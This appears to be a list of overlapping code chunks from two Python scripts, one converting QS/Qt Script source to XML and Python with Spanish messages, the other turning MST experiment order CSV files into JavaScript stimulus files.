"False @classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return True",
"args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose:",
"tags = [\"for_initialize\"] class ForCompare(ListObject): tags = [\"for_compare\"] class ForIncrement(ListObject): tags = [\"for_increment\"]",
"file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file exists, don't regenerate",
"Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"] class",
"adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn = False",
"options.storepath: destname = os.path.join(options.storepath, bname + \".xml\") else: destname = filename + \".xml\"",
"= [\"for_increment\"] class DoWhile(ListObject): tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class",
"in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero",
"+ \".xml\")] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename)",
". (%.1f%%) \" % (bname, 100.0 * (nf + 1.0) / nfs)) if",
"def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname): classobj = None for",
"if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod = Module(name,",
"Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\" def add_exttype(self, argn,",
"XML file . . .\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc())",
"is_in(self, listobj): return self.__class__ in listobj or self.astname in listobj def get(self, listobj,",
"\\r\" % (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush()",
"quiere guardar resultado, no hace falta calcular mas continue tree_data = None try:",
"> os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename in enumerate(args): bname",
"tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem):",
"tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname",
"messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\",",
"NamedObject(TagObject): name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn",
"args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\",",
"self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\",",
"se pudo parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast",
"tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags def",
"tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) ==",
"this one at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False",
"treedata): xmlelem = create_xml(tagname) i = 0 for k, v in treedata['content']: if",
"\"Variable\" return \"Unknown.%s\" % tagname xml_class_types = [] class TagObjectFactory(type): def __init__(cls, name,",
"one at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod",
"UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path): self.name = name self.path",
"value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype)",
"self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname): self.astname",
"action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write",
"options.verbose: print(\"Pass 1 - Parse and write XML file . . .\") try:",
"= False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"]",
"return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml",
"= [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] #",
"if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname = filename +",
"[\"new_operator\"] class Delete(ListObject): tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags =",
"result = True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result =",
"pudo parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast is",
"argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn",
"class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags = [\"new_operator\"] class Delete(ListObject): tags",
"[\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other = False set_child_argn",
"options.verbose: print(\"Pass 2 - Pythonize and write PY file . . .\") try:",
"parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if options.verbose: print(\"Pass 2 -",
". (%.1f%%) \\r\" % (bname, 100.0 * (nf + 1.0) / nfs)) if",
"falta calcular mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except",
"['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone",
"tags = [\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject):",
"tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None: self.astname = \"empty\"",
"self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags = [\"ifstatement\"]",
"return self.__name__ @classmethod def can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname):",
"self.xmlname is None: self.xmlname = value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype",
"\".xml\")] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if",
"{} promote_child_if_alone = False @classmethod def tagname(self, tagname): return self.__name__ @classmethod def can_process_tag(self,",
"# str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\",",
"get(self, listobj, default=None): if self.__class__ in listobj: return listobj[self.__class__] if self.astname in listobj:",
"subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype,",
"vtype = \"Number\" if vtype == \"FCONST\": vtype = \"Number\" self.const_value = value",
"it\") (options, args) = parser.parse_args(argv) return (options, args) def main(): options, args =",
"value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if vtype == \"SCONST\": vtype = \"String\" value",
"options.full = False options.toxml = True if options.verbose: print(\"Pass 1 - Parse and",
"parsear %-35s \\n\" % (repr(filename))) continue ast = post_parse(tree_data) if ast is None:",
"False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class ArrayMember(TagObject): debug_other",
"= value self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value))",
"== 0: self.xml.set(\"mode\", \"update-read\") if argn == 1: self.xml.set(\"mode\", \"read-update\") class If(ListObject): tags",
"end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self, tagname):",
"(repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se",
"True # ----------------- def create_xml(tagname): classobj = None for cls in xml_class_types: if",
"\"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject):",
"Si no se quiere guardar resultado, no hace falta calcular mas continue tree_data",
"if ast is None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue",
"mas continue tree_data = None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error",
"Unknown(TagObject): promote_child_if_alone = True set_child_argn = False @classmethod def tagname(self, tagname): return tagname",
"DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if",
"def can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname): self.astname = tagname",
"\".py\") else: destname = filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not",
"in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x +",
"al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se",
"= False if fp: fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\",",
"= True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject):",
"flscriptparse.cleanNoPython(filecontent) except Exception as e: print(\"Error: No se pudo abrir fichero %-35s \\n\"",
"= ['vardecl_list'] def add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype)",
"Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3",
"def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not in KNOWN_PARSERS: UNKNOWN_PARSERS[tagname] =",
"class Condition(ListObject): tags = [\"condition\"] class Else(ListObject): tags = [\"optelse\"] def polish(self): if",
"set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags = ['varmemcall', \"member_var\", \"member_call\"] class",
".pytnyzer import pythonize import io if options.cache: args = [x for x in",
"self.set_child_argn: subelem.xml.set(\"argn\", str(argn)) self.xml.append(subelem.xml) self.subelems.append(subelem) def add_value(self, argn, vtype, value): self.values.append((vtype, value)) if",
"if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))]",
"argn, vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname",
"= [] class TagObjectFactory(type): def __init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory,",
"True set_child_argn = False debug_other = False class TypedObject(ListObject): type_arg = 0 def",
"flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:]))",
"def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object):",
"True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other",
"= sys.stdout stream = io.StringIO() sys.stdout = stream try: pythonize(filename, destname, destname +",
"class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags",
"vtype, value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname is",
"= \"empty\" return self class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname",
"[\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class",
"= [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class",
"if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0",
"self.astname = \"empty\" return self class DictObject(ListObject): tags = [\"dictobject_value_elemlist\", \"dictobject_value\"] adopt_childs_tags =",
"class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self,",
"= 0 def add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype)",
"= open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module =",
"print(options, args) if options.full: execpython = options.exec_python options.exec_python = False options.full = False",
"return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0",
"%-35s . . . . (%.1f%%) \" % (bname, 100.0 * (nf +",
"\".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x + \".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for",
"= parse(k, v) xmlelem.add_subelem(i, instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else:",
"+ \".xml\") or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for nf,",
"tags = [\"optextends\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return",
"= os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\"",
"+ \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r no encontrado\"",
"in treedata['content']: if type(v) is dict: instruction = parse(k, v) xmlelem.add_subelem(i, instruction) elif",
"vtype) def polish(self): if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1:",
"realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe:",
"tags = [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"]",
"TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id = False debug_other =",
"tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class Compare(TypedObject):",
"PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\",",
"class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags = [\"unary_operator\"]",
"add_other(self, argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): #",
"+ \":\" + repr(value)) def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" %",
"from .pytnyzer import pythonize import io if options.cache: args = [x for x",
"bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args = [x for",
"(\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args = [x for x in",
". . .\") try: execute(options, [arg + \".xml\" for arg in args]) except",
"Parse and write XML file . . .\") try: execute(options, args) except Exception:",
"= [] omit_tags = ['empty'] callback_subelem = {} promote_child_if_alone = False @classmethod def"
] |
[
"src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test()",
"<gh_stars>0 from src.common.config import nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint",
"test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"pending\")) # EXECUTE",
"= AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\"))",
"import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() ->",
"-> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"pending\")) # EXECUTE test()",
"src.common.config import nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug",
"TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\")",
"# VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>>",
"from src.common.config import nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from",
"AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client =",
"pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS",
"pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None:",
"import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST",
"AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>>",
"pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) #",
"nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict",
"from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri)",
"import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client",
"from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict #",
"VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>> LATEST",
"# TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING",
"src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS",
"FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"pending\"))",
"client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def test() -> None: print(\">>> LATEST BLOCK\")",
"from src.libs.Web3Client.helpers.debug import pprintAttributeDict # VARS client = AvalancheCWeb3Client(nodeUri=nodeUri) # TEST FUNCTIONS def",
"def test() -> None: print(\">>> LATEST BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"latest\")) print(\">>> PENDING BLOCK\") pprintAttributeDict(client.w3.eth.get_block(\"pending\")) #",
"import nodeUri from src.libs.Web3Client.AvalancheCWeb3Client import AvalancheCWeb3Client from pprint import pprint from src.libs.Web3Client.helpers.debug import"
] |
[
"action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to",
"-- A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node')",
"hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost',",
"of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store',",
"ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name",
"to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to') args",
"'--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port",
"import ArgumentParser from dht.server import app if __name__ == '__main__': parser = ArgumentParser(",
"from argparse import ArgumentParser from dht.server import app if __name__ == '__main__': parser",
"python from argparse import ArgumentParser from dht.server import app if __name__ == '__main__':",
"argparse import ArgumentParser from dht.server import app if __name__ == '__main__': parser =",
"if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash",
"'--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind",
"'--port', action='store', type=int, required=True, help='port to bind to') args = parser.parse_args() app.run(host=args.host, port=args.port)",
"dht.server import app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A",
"to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to') args = parser.parse_args()",
"parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to",
"bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to') args =",
"'__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name',",
"help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to')",
"app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed",
"ArgumentParser from dht.server import app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT",
"= ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True,",
"description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of",
"node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int,",
"simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host',",
"help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port',",
"#!/usr/bin/env python from argparse import ArgumentParser from dht.server import app if __name__ ==",
"from dht.server import app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT --",
"== '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n',",
"__name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash table')",
"import app if __name__ == '__main__': parser = ArgumentParser( description='PiplineDHT -- A simple",
"parser = ArgumentParser( description='PiplineDHT -- A simple distributed hash table') parser.add_argument('-n', '--name', action='store',",
"required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p',",
"action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to')",
"distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store',",
"default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind",
"parser.add_argument('-p', '--port', action='store', type=int, required=True, help='port to bind to') args = parser.parse_args() app.run(host=args.host,",
"parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname to bind to') parser.add_argument('-p', '--port', action='store', type=int, required=True,",
"A simple distributed hash table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k',",
"table') parser.add_argument('-n', '--name', action='store', required=True, help='name of node') parser.add_argument('-k', '--host', action='store', default='localhost', help='hostname"
] |
[
"else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write('",
"We've been using some online order files in our original PsychoPy-derived web-based MST.",
"open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if",
"if row[3]=='v': corr3.append('0') corr2.append('0') elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else:",
"corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n')",
"order files in our original PsychoPy-derived web-based MST. This converts those actual .csv",
"'{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i < (len(cond)-1):",
"fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for",
"trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) +",
"'}') if i < (len(cond)-1): outfile.write(',\\n') else: outfile.write('\\n') outfile.write(']\\n') outfile.close() for fname in",
"testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',')",
"online order files in our original PsychoPy-derived web-based MST. This converts those actual",
"stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0])",
"fname in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile:",
"'{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if i",
"in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3},",
".js ones we'll be using here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark",
"actual .csv files into the .js ones we'll be using here \"\"\" import",
"row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i",
"in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)):",
"Wed Apr 1 17:05:31 2020 @author: craig We've been using some online order",
"+ \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}')",
"\"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2: {4}\".format(stim[i],cond[i],lbin[i],corr3[i],corr2[i]) + '}') if",
"1 17:05:31 2020 @author: craig We've been using some online order files in",
"of California - Irvine\",\"Documents\",\"cordova_cMST\",\"www\",\"jsOrders\") studyfiles=glob.glob(os.path.join(inpath,\"MST*p1_o*csv\")) testfiles=glob.glob(os.path.join(inpath,\"MST*p2_o*csv\")) for fname in studyfiles: print(fname) stim=[] cond=[]",
"some online order files in our original PsychoPy-derived web-based MST. This converts those",
"infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim:",
"Apr 1 17:05:31 2020 @author: craig We've been using some online order files",
"elif row[3]=='b': corr3.append('1') corr2.append('2') elif row[3]=='n': corr3.append('2') corr2.append('2') else: corr3.append('-1') corr2.append('-1') infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath)",
"for fname in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader)",
"17:05:31 2020 @author: craig We've been using some online order files in our",
"range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i]) + '}') if i <",
"infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) lbin.append(row[2]) if row[3]=='v': corr3.append('0')",
"into the .js ones we'll be using here \"\"\" import os, csv, glob",
"in studyfiles: print(fname) stim=[] cond=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',') next(reader) for row",
"infile: reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var",
"here \"\"\" import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of",
"import os, csv, glob inpath=os.path.join('G:',os.sep,'Shared drives','Stark Lab','MST_Psychopy','InitialPPy_Online_Version','OnlineOrders') outpath=os.path.join(\"C:\",os.sep,\"Users\",\"craig\",\"OneDrive - University of California -",
"reader=csv.reader(infile,delimiter=',') next(reader) for row in reader: stim.append(row[0]) cond.append(row[1]) infile.close() outfname=fname.replace('csv','js').replace(inpath,outpath) outfile=open(outfname,\"w\") outfile.write('var trial_stim=[\\n')",
"outfile.write('var trial_stim=[\\n') for i in range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}'\".format(stim[i],cond[i])",
"in testfiles: print(fname) stim=[] cond=[] lbin=[] corr3=[] corr2=[] with open(fname,\"r\") as infile: reader=csv.reader(infile,delimiter=',')",
"range(len(cond)): outfile.write(' {' + \"stim: '{0}', cond: '{1}', lbin: {2}, corr3: {3}, corr2:",
"using some online order files in our original PsychoPy-derived web-based MST. This converts",
